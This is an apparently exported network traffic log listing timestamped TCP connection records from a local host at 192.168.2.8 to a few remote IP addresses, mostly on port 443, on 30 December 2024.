                                                                                                                                                                            Dec 30, 2024 11:49:41.352058887 CET49878443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.363329887 CET44349875142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.368952990 CET44349877142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.369019985 CET49877443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:41.383887053 CET49877443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:41.383903980 CET44349877142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.384205103 CET44349877142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.384262085 CET49877443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:41.388811111 CET49877443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:41.391336918 CET44349876142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.399321079 CET44349878142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.435323000 CET44349877142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.680182934 CET44349875142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.680244923 CET49875443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.680272102 CET44349875142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.680311918 CET49875443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.680754900 CET49875443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.680798054 CET44349875142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.680883884 CET49875443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.681791067 CET49880443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.681829929 CET44349880142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.681911945 CET49880443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.682337046 CET49880443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.682359934 CET44349880142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.720638037 CET44349878142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.720717907 CET49878443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.720745087 CET44349878142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.721003056 CET49878443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.721877098 CET44349878142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.721926928 CET44349878142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.721983910 CET49878443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.754744053 CET44349876142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.754801035 CET44349876142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.754909992 CET44349876142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.754915953 CET49876443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:41.754959106 CET49876443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:41.906481028 CET44349877142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.906524897 CET44349877142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.906641960 CET44349877142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.906703949 CET49877443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:41.906719923 CET49877443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:41.967300892 CET49878443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.967343092 CET44349878142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.967952967 CET49881443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.967989922 CET44349881142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.968054056 CET49881443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.969476938 CET49881443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.969491005 CET44349881142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.015019894 CET49876443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:42.015038013 CET44349876142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.016104937 CET49882443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:42.016161919 CET44349882142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.017437935 CET49882443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:42.017754078 CET49882443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:42.017766953 CET44349882142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.031177998 CET49877443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:42.031202078 CET44349877142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.047255039 CET49884443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:42.047307968 CET44349884142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.047487974 CET49884443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:42.048428059 CET49884443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:42.048439026 CET44349884142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.292607069 CET44349880142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.292716980 CET49880443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.300158978 CET49880443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.300168037 CET44349880142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.300523996 CET49880443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.300535917 CET44349880142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.569473982 CET44349881142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.569809914 CET49881443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.570297956 CET49881443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.570303917 CET44349881142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.570498943 CET49881443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.570504904 CET44349881142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.628249884 CET44349882142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.628320932 CET49882443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:42.628906012 CET49882443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:42.628917933 CET44349882142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.629085064 CET49882443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:42.629092932 CET44349882142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.648502111 CET44349884142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.648592949 CET49884443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:42.649055958 CET49884443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:42.649068117 CET44349884142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.649282932 CET49884443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:42.649286985 CET44349884142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.666316032 CET44349880142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.666394949 CET49880443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.666533947 CET49880443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.666568041 CET44349880142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.666692972 CET49880443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.667395115 CET49885443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.667427063 CET44349885142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.667521000 CET49885443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.668095112 CET49885443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.668108940 CET44349885142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.943115950 CET44349881142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.943203926 CET49881443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.943217039 CET44349881142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.943289995 CET49881443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.943361998 CET49881443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.943401098 CET44349881142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.943481922 CET49881443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.943974972 CET49886443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.944013119 CET44349886142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:42.944088936 CET49886443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.944374084 CET49886443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:42.944385052 CET44349886142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.105983019 CET44349882142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.106041908 CET44349882142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.106062889 CET49882443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.106091022 CET44349882142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.106101990 CET49882443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.106127977 CET49882443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.106132984 CET44349882142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.106158972 CET44349882142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.106189966 CET49882443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.106211901 CET49882443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.106869936 CET49882443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.106884003 CET44349882142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.107727051 CET49887443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.107757092 CET44349887142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.107815027 CET49887443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.108033895 CET49887443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.108047962 CET44349887142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.260888100 CET44349884142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.260940075 CET44349884142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.261045933 CET44349884142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.261045933 CET49884443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.261168957 CET49884443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.262613058 CET49884443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.262628078 CET44349884142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.263783932 CET49890443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.263814926 CET44349890142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.264110088 CET49890443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.264110088 CET49890443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.264137983 CET44349890142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.362175941 CET44349885142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.362473011 CET49885443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.362935066 CET44349885142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.363051891 CET49885443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.389427900 CET49885443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.389457941 CET44349885142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.389753103 CET44349885142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.389929056 CET49885443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.392349958 CET49885443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.439328909 CET44349885142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.543442011 CET44349886142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.543606043 CET49886443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.544208050 CET44349886142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.544611931 CET49886443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.551904917 CET49886443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.551933050 CET44349886142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.552248001 CET44349886142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.553487062 CET49886443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.555555105 CET49886443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.599344969 CET44349886142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.707045078 CET44349887142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.707624912 CET49887443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.728399038 CET49887443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.728427887 CET44349887142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.733418941 CET49887443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.733443022 CET44349887142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.739414930 CET44349885142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.739499092 CET49885443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.739516973 CET44349885142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.739599943 CET49885443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.739634991 CET49885443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.739670992 CET44349885142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.739794016 CET49885443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.740256071 CET49891443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.740298986 CET44349891142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.740784883 CET49891443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.740943909 CET49891443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.740957975 CET44349891142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.745985031 CET49890443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.746064901 CET49886443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.746602058 CET49892443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.746646881 CET44349892142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.746790886 CET49892443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.747246981 CET49892443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:43.747258902 CET44349892142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.748161077 CET49893443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.748203039 CET44349893142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:43.748272896 CET49893443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.748536110 CET49893443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:43.748552084 CET44349893142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.106507063 CET44349887142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.106596947 CET49887443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.107029915 CET44349887142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.107076883 CET44349887142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.107090950 CET49887443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.107101917 CET44349887142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.107126951 CET49887443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.107151031 CET49887443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.107156038 CET44349887142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.107228994 CET49887443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.107234955 CET44349887142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.107244015 CET44349887142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.107295036 CET49887443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.107295036 CET49887443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.107960939 CET49887443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.107974052 CET44349887142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.339093924 CET44349891142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.339164019 CET49891443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:44.347341061 CET44349892142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.347523928 CET49892443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.361536026 CET49891443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:44.361556053 CET44349891142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.361783981 CET49891443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:44.361788988 CET44349891142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.363341093 CET49892443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.363359928 CET44349892142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.363653898 CET44349892142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.363744020 CET49892443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.366030931 CET49892443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.376029968 CET44349893142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.376219988 CET49893443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:44.376611948 CET49893443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:44.376622915 CET44349893142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.376868010 CET49893443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:44.376874924 CET44349893142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.411324978 CET44349892142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.704216957 CET44349891142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.704303026 CET44349891142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.704410076 CET49891443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:44.742126942 CET44349892142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.742208004 CET44349892142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.742292881 CET49892443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.742304087 CET44349892142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.742316008 CET44349892142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.742355108 CET49892443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.747793913 CET44349893142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.748361111 CET44349893142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.748447895 CET49893443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:44.797877073 CET49891443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:44.797888041 CET44349891142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.813692093 CET49894443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.813723087 CET44349894142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.813783884 CET49894443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.814289093 CET49895443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:44.814338923 CET44349895142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.814511061 CET49895443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:44.814712048 CET49894443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.814730883 CET44349894142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.814903021 CET49895443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:44.814918041 CET44349895142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.816648960 CET49892443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.816668987 CET44349892142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.817608118 CET49893443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:44.817608118 CET49893443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:44.817620039 CET44349893142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.818128109 CET49896443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.818135977 CET44349896142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.818145990 CET49893443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:44.818185091 CET49896443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.818348885 CET49897443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:44.818367004 CET44349897142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.818445921 CET49897443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:44.818646908 CET49897443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:44.818659067 CET44349897142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:44.820075989 CET49896443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:44.820089102 CET44349896142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:45.381839037 CET804975569.42.215.252192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:45.381933928 CET4975580192.168.2.869.42.215.252
                                                                                                                                                                            Dec 30, 2024 11:49:45.414933920 CET44349895142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:45.414988995 CET49895443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:45.415563107 CET49895443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:45.415574074 CET44349895142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:45.417387962 CET49895443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:45.417399883 CET44349895142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:45.418220997 CET44349897142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:45.418323994 CET49897443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:45.418773890 CET49897443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:45.418782949 CET44349897142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:45.418905020 CET49897443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:45.418910027 CET44349897142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:45.422782898 CET44349894142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:45.422880888 CET49894443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:45.423199892 CET49894443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:45.423203945 CET44349894142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:45.425132990 CET49894443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:45.425143957 CET44349894142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:45.429641962 CET44349896142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:45.429718971 CET49896443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:45.430232048 CET49896443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:45.430242062 CET44349896142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:45.430454969 CET49896443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:45.430459976 CET44349896142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:45.792774916 CET44349897142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:45.792867899 CET49897443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:45.792882919 CET44349897142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:45.792929888 CET49897443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:45.793466091 CET49897443192.168.2.8142.250.185.78
